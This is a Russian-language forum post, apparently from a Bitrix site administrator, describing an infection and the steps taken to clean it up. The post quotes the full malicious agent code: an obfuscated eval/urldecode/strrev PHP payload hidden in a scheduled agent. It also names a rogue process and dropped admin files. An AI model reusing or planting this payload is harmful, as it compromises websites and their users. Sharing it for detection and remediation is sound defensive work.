Мы у себя также обнаружили файл в процессах с вредоносным кодом
Код |
---|
bitrix+ 10296 0.0 0.0 201500 21048 ? S 03:30 0:05 php /var/www/bitrix/src/app/l.php |
А так также Агент с вредоносным кодом
Код |
---|
$arAgent["NAME"];//_(9.)H'5t}>qo7ouj7<(>!)U}3/]6u8u}Q%' //>w7u5ST<"IA.xY:8eeval /*9!._IkZ)1 DcpyxJA\"F/C1ra/9+E/&^15>Z"yd3y)vk$p6FN*/(/*]~P@.iKSyR3+hRfkLK~GUv3ZgJ!6dmtClEc{/*/urldecode#Dcc5L6|8cI8+~/?Y(/*I$s6IW3YhccLGyx^v2BAJN@ZnzRYVa+*/strrev/*8/WKh@/MlVGf6?yY`E)" w}SRU5]V{]n+5:tVJCC"j+8+%rlK{n*/(/* GC5%z1bi=x%3OOVsQB~jM%]:PZ*|Ox|v<3|8D`"bY(u*/'b3%56%57%27%47%02%e6%27%57%47%56%27%02%02%02%02%02%02%02%02%a0%d7%02%02%02%02%a0%b3%92%27%42%82%c6%16%67%56%02%02%02%02%a0%56%37%c6%56%02%02%02%02%a0%d7%02%02%02%02%a0%b3%27%42%02%d3%02%47%c6%57%37%56%27%f5%c6%16%67%56%42%02%02%02%02%a0%b3%92%22%13%02%d3%02%44%94%02%54%25%54%84%75%02%72%e4%72%02%d3%02%44%f4%94%25%54%05%f5%35%94%02%c2%03%63%02%d3%02%c4%14%65%25%54%45%e4%94%f5%45%e4%54%74%14%02%45%54%35%02%47%e6%56%76%16%f5%26%02%54%45%14%44%05%55%22%82%97%27%56%57%15%e3%d2%24%44%42%02%02%02%02%a0%b7%92%92%d5%22%87%87%87%56%27%f6%47%37%56%27%22%b5%45%35%54%55%15%54%25%f5%42%82%47%56%37%37%96%82%66%96%02%02%02%02%a0%b3%72%b3%92%82%16%47%16%44%47%96%d6%26%57%37%a3%a3%56%c6%26%16%45%16%47%16%44%27%56%47%e6%57%f6%34%c5%c5%37%36%96%47%97%c6%16%e6%14%c5%c5%e6%96%16%d4%c5%c5%87%96%27%47%96%24%c5%c5%72%02%d3%02%27%42%02%02%02%02%a0%b7%56%37%c6%56%02%02%02%02%a0%d7%02%02%02%02%a0%d7%02%02%02%02%a0%b3%47%96%87%56%02%02%02%02%a0%b7%92%56%42%02%e6%f6%96%47%07%56%36%87%54%82%02%86%36%47%16%36%02%02%02%02%a0%d7%02%02%02%02%a0%b3%92%92%92%d5%22%87%87%87%96%27%47%96%26%22%b5%45%35%54%55%15%54%25%f5%42%82%56%46%f6%36%56%46%c6%27%57%82%56%46%f6%36%56%46%c6%27%57%82%c6%16%67%56%02%d3%02%56%42%02%02%02%02%a0%b7%97%27%47%02%02%02%02%a0%a0%b3%92%22%13%02%d3%02%44%94%02%54%25%54%84%75%02%72%e4%72%02%d3%02%74%e4%94%e4%e4%55%25%02%c2%03%02%d3%02%45%e4%55%f4%34%f5%95%25%45%54%25%02%c2%c4%c4%55%e4%02%d3%02%b4%34%54%84%34%f5%54%45%14%44%02%45%54%35%02%47%e6%56%76%16%f5%26%02%54%45%14%44%05%55%22%82%97%27%56%57%15%e3%d2%24%44%42%02%02%02%02%a0%b7%92%92%d5%22%87%87%87%96%27%47%96%26%22%b5%45%35%54%55%15%54%25%f5%42%82%47%56%37%37%96%82%66%96%02%02%02%02%a0%02%02%02%02%02%02%02%02%a0%'/*}+o|u>#TYS0cP_\NWyaT2'55io>_yv*/) #T/N82kY'xApsEIx`?}`2_DB3;dm) /*pqPWM{~IE(WOT)l=?x[>zBI# yCBI#B:usrCorl6zEeOOSmoMJ.*/)/*LlRo0|sR8iF+.7}{MxB4Iqg8a5bp^OJ+=|z*/;/*"3YH?h_>d.8'Cay+z\A]M!.x,Lu({qx}&SFE<'c!6|)Y^*/
|
Помогли следующие шаги:
1. Восстановить сайт из незараженной копии
2. Удалить vote модуль, мы ним не пользуемся
3. Убить вредоносный процесс (/var/www/bitrix/src/app/l.php)
4. Восстановить агент, который был заражен. Там изначально был просто код CEvent::CleanUpAgent();
5. Удалить файлы php, которые были созданы в корневой папке сайта и в /bitrix/admin (/bitrix/admin/f408f2b7df70.php, /f408f2b7df70.php)
Пока файл перестал создаваться, хотя запросы продолжаются.
Будем наблюдать.